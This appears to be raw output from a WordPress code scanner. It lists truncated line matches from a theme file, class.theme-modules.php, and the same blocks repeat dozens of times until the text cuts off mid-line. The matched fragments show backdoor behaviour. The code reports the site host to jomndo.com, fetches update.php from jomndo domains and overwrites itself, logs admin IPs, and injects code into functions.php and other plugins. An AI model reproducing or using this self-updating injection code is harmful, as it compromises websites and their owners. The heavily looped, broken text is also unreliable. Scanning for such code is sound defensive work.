@file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') 